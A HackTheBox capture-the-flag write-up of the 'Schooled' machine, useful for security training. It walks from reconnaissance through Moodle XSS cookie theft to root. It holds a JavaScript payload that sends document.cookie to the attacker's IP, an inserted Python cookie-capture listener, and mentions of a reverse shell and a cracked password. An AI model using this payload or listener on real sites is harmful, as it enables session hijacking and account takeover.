Schooled - HackTheBox
I started with an Nmap scan to detect open ports on the machine.
┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# nmap -sS --min-rate=5000 -vvv -n -Pn --open 10.10.10.234 -oN targeted
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 06:18 EDT
Initiating SYN Stealth Scan at 06:18
Scanning 10.10.10.234 [1000 ports]
Discovered open port 22/tcp on 10.10.10.234
Discovered open port 80/tcp on 10.10.10.234
Completed SYN Stealth Scan at 06:18, 0.52s elapsed (1000 total ports)
Nmap scan report for 10.10.10.234
Host is up, received user-set (0.047s latency).
Scanned at 2021-09-18 06:18:46 EDT for 0s
Not shown: 798 filtered ports, 200 closed ports
Reason: 798 no-responses and 200 resets
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
Raw packets sent: 1798 (79.112KB) | Rcvd: 202 (8.088KB)
I did another scan to detect the version of each open port.
┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# nmap -sC -sV -p22,80 10.10.10.234 -oN webScan
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 06:20 EDT
Nmap scan report for 10.10.10.234
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.25 seconds
Two ports were open: the first was the SSH service and the other was a web server. There was little I could do with SSH without credentials, so I looked at what was on the web server.
It appeared to be a school page. Investigating it a little more, I found the following in the footer of the website.
This caught my attention: I thought that virtual hosting could be in use, that is, several domains hosted on a single IP, so I added schooled.htb to /etc/hosts.
I went back to the website, but there was nothing interesting.
I used whatweb to see whether it was running any CMS.
┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# whatweb http://schooled.htb/
http://schooled.htb/ [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge]
Apparently it was the same page, so I fuzzed for subdomains (sending each candidate in the Host header) and found one that caught my attention.
┌──(root💀kali)-[/home/kali/HTB/Schooled/machine]
└─# wfuzz -c --hc=404 -u http://schooled.htb/ -H "Host: FUZZ.schooled.htb" -w /usr/share/amass/wordlists/subdomains.lst -t 20 --hw=1555
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://schooled.htb/
Total requests: 8215
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002430: 400 10 L 45 W 347 Ch "ferrari.fortwayne.com."
000004127: 200 1 L 5 W 84 Ch "moodle"
moodle was a subdomain that was apparently in use, so I added moodle.schooled.htb to /etc/hosts.
This time the page showed something different: it was a Moodle instance.
It had a Log In button; clicking it redirected me to a login page.
I had no credentials so there was little I could do, but I could register.
Once registered, I logged in.
Looking at all the available courses, Mathematics was the only one with a user named ‘Manuel Philips’.
I found a comment from this user.
What caught my attention most was that it said all users would be verified. Looking a little further at the page, I found this field that apparently reached Manuel Philips, so I tested whether it was vulnerable to XSS.
The alert popped up on the screen.
Now that I knew it was vulnerable to XSS, I remembered the message saying that all users would be verified, so I thought about cookie hijacking, that is, stealing the privileged user's session cookie when he reviews my profile. Note that this only works because the session cookie is readable from JavaScript: a cookie flagged HttpOnly is not exposed through document.cookie. To do this I used the following JavaScript payload.
<script>document.location="http://10.10.16.3/value_cookie="+document.cookie</script>
It can actually be done in many ways.
I started an HTTP server with Python and received my own session cookie via GET, plus other cookies that were not mine.
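The listener used for this step is not shown in the original write-up; the following is an added example of one, not code from the write-up or from the Schooled box. It assumes the payload shown above, which makes the victim's browser request http://<attacker>/value_cookie=<document.cookie>, and therefore listens on port 80 by default because the payload gives no port. The extract_cookie function also accepts the more common /?c=<document.cookie> query form so the same listener serves either payload style.

```python
#!/usr/bin/env python3
"""Minimal cookie-capture listener for a document.location XSS payload.

Added example (not code from the original write-up). The path prefix
"/value_cookie=" comes from the payload in the write-up; the "?c=" query
form is an additional assumption so the listener also serves that style.
"""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl, unquote, urlsplit

MARKER = "/value_cookie="  # path prefix used by the payload on this page

# Every cookie set captured so far, in arrival order (one dict per request).
received: list[dict[str, str]] = []


def extract_cookie(path: str) -> dict[str, str]:
    """Return the cookies encoded in a request path as a name->value dict.

    Handles the write-up's form (/value_cookie=NAME=VAL;%20NAME2=VAL2) and
    the query form (/?c=NAME=VAL). Browsers leave ';' and '=' as-is in the
    path but percent-encode spaces, so the raw string is unquoted first.
    A value may itself contain '=' (e.g. base64), so split on the first one.
    """
    if path.startswith(MARKER):
        raw = unquote(path[len(MARKER):])
    else:
        query = dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))
        raw = query.get("c", "")
    cookies: dict[str, str] = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


class CookieHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        cookies = extract_cookie(self.path)
        if cookies:
            received.append(cookies)
            # Each hit comes from a different browser; the interesting one is
            # any session cookie (MoodleSession here) that is not our own.
            print(f"[+] {self.client_address[0]} sent {cookies}", flush=True)
        else:
            print(f"[-] {self.client_address[0]} requested {self.path}", flush=True)
        # Answer 204 so the victim's browser renders nothing suspicious.
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt: str, *args) -> None:
        pass  # we print our own lines above; silence the default access log


def serve(port: int = 80) -> None:
    """Block forever, printing every cookie delivered to this host."""
    with HTTPServer(("0.0.0.0", port), CookieHandler) as httpd:
        print(f"[*] listening on 0.0.0.0:{port}", flush=True)
        httpd.serve_forever()


if __name__ == "__main__":
    # Usage: sudo python3 listener.py [port]   (80 needs root)
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 80)
```

Binding port 80 requires root on the attacking machine; if you listen on a higher port instead, the port must also be added to the URL in the payload. The first cookie that arrives is normally your own, triggered when the page with the payload renders for you, so wait for a second hit from a different client address before trying to reuse a MoodleSession value.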
I authenticated with the cookie I received, and it turned out to belong to the user Manuel Philips. Going back to the earlier message, I saw that it mentioned MoodleNet, so I investigated and found a Lanz exploit that yields RCE.
I ran it with Manuel Philips's session cookie, launched a reverse shell through mkfifo, and gained access to the machine.
Investigating the machine, I found a file called config.php that contained MySQL credentials.
Before using MySQL, I used the mysqlshow utility to list the databases and their tables.
After enumerating the Moodle database I found a table of interest called mdl_user. Enumerating it showed several columns, but the ones that stood out were “username”, “password” and “email”; querying them gave me the hashes of several users.
I cracked the hashes locally with john and recovered the credential !QAZ2wsx, which belonged to the user jamie. Since the machine had SSH open, I tried to authenticate with these credentials and got in; I could now read the user flag.
PRIVILEGE ESCALATION
Running sudo -l, I saw that I could run pkg as any user.
I went to GTFOBins and found a payload that allowed me to escalate privileges: build a FreeBSD package with fpm whose before-install script is run by pkg install, and since pkg runs through sudo, that script runs with root privileges.
fpm was not installed on the victim machine, so I built the package on my own machine with a script that sets the SUID bit on bash, transferred it to the victim and installed it with pkg. After that I could read the root flag.